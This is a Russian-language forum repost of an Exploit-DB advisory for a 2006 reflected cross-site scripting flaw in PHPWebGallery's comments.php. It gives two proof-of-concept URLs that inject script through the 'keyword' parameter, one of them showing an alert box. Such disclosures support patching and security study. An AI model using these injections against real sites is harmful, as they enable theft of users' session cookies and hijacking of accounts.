Exploit PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28161
Проверка EDB
  1. Пройдено
Автор
ISS4M
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-3476
Дата публикации
2006-07-04
Код:
source: https://www.securityfocus.com/bid/18798/info

PhpWebGallery is prone to a cross-site scripting vulnerability because it fails to sanitize input before displaying it to users of the application.

An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/phpwebgallery/comments.php?keyword=%22%3E[XSS]

http://www.example.com/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E
 
Источник
www.exploit-db.com

Похожие темы